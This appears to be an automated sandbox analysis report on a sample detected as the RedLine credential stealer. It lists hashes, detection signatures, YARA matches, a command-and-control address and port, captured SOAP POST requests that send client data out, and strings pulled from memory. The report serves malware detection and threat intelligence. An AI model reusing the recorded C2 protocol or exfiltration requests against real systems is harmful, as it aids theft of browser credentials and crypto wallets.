Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.25862

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.25862 (renamed file extension from 25862 to exe)
Analysis ID:356847
MD5:a6602f490e70a0c9846906944c01b1ba
SHA1:3864724e9136d3090cd2e7afa5ae4a348e07e0e4
SHA256:1733a30d0e7acb953730092047086555a39f5cb2ee2549021e253cbdc931fb91
Tags:RedLineStealer
Infos:

Most interesting Screenshot:

Detection

RedLine
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected RedLine Stealer
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000001.00000003.206836108.000000000075C000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000001.00000003.206836108.000000000075C000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000001.00000002.270171901.0000000002363000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a405e.4.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a405e.4.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a405e.4.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a405e.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310000.1.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      Click to see the 19 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus / Scanner detection for submitted sampleShow sources
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeAvira: detected
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeVirustotal: Detection: 74%Perma Link
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeMetadefender: Detection: 27%Perma Link
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeReversingLabs: Detection: 75%
                      Machine Learning detection for sampleShow sources
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeJoe Sandbox ML: detected

                      Compliance:

                      barindex
                      Uses 32bit PE filesShow sources
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, RELOCS_STRIPPED
                      Binary contains paths to debug symbolsShow sources
                      Source: Binary string: _.pdb source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.206836108.000000000075C000.00000004.00000001.sdmp

                      Networking:

                      barindex
                      Uses known network protocols on non-standard portsShow sources
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 3214
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3214 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3214 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 3214
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3214 -> 49726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3214 -> 49726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 3214
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3214 -> 49728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3214 -> 49728
                      Source: global trafficTCP traffic: 192.168.2.3:49718 -> 45.14.13.58:3214
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings"Host: 45.14.13.58:3214Content-Length: 136Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/SendClientInfo"Host: 45.14.13.58:3214Content-Length: 1109278Expect: 100-continueAccept-Encoding: gzip, deflate
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/GetTasks"Host: 45.14.13.58:3214Content-Length: 1083264Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 192.0.47.59 192.0.47.59
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.14.13.58
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmpString found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                      Source: unknownDNS traffic detected: queries for: api.ip.sb
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings"Host: 45.14.13.58:3214Content-Length: 136Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmpString found in binary or memory: http://45.14.13.58:3214
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmpString found in binary or memory: http://45.14.13.58:3214/
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: http://45.14.13.58:32144
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270752515.0000000002796000.00000004.00000001.sdmpString found in binary or memory: http://api.ip.sb
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270752515.0000000002796000.00000004.00000001.sdmpString found in binary or memory: http://api.ip.sb.cdn.cloudflare.net
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmpString found in binary or memory: http://bot.whatismyipaddress.com/
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275067190.00000000058AB000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmpString found in binary or memory: http://checkip.dyndns.org
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275112004.00000000058E5000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275067190.00000000058AB000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275112004.00000000058E5000.00000004.00000001.sdmpString found in binary or memory: http://crl4.dig
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275067190.00000000058AB000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: http://forms.rea
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: http://go.micros
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.268740526.0000000008713000.00000004.00000001.sdmpString found in binary or memory: http://ns.ado/1
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.256274496.0000000008701000.00000004.00000001.sdmpString found in binary or memory: http://ns.ado/1o
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.268740526.0000000008713000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/g
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.256274496.0000000008701000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/go
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.268740526.0000000008713000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cobj
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.256274496.0000000008701000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cobjo
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275067190.00000000058AB000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275067190.00000000058AB000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: http://schemas.datacontract.org
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/CONTEXT.Models.Enums
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: http://service.r
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: http://support.a
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/0
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IRemotePanel/CompleteTask
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IRemotePanel/CompleteTaskResponse
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IRemotePanel/GetSettings
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IRemotePanel/GetSettingsResponse
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IRemotePanel/GetTasks
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IRemotePanel/GetTasksResponse
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IRemotePanel/SendClientInfo
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IRemotePanel/SendClientInfoResponse
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmpString found in binary or memory: http://www.geoplugin.net/json.gp?ip=https://api.ip.sb/geoipsecuritywaves-exchange
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/geoip
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabt
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: https://get.adob
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: https://helpx.ad
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmpString found in binary or memory: https://icanhazip.com
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmpString found in binary or memory: https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.260994800.0000000008210000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
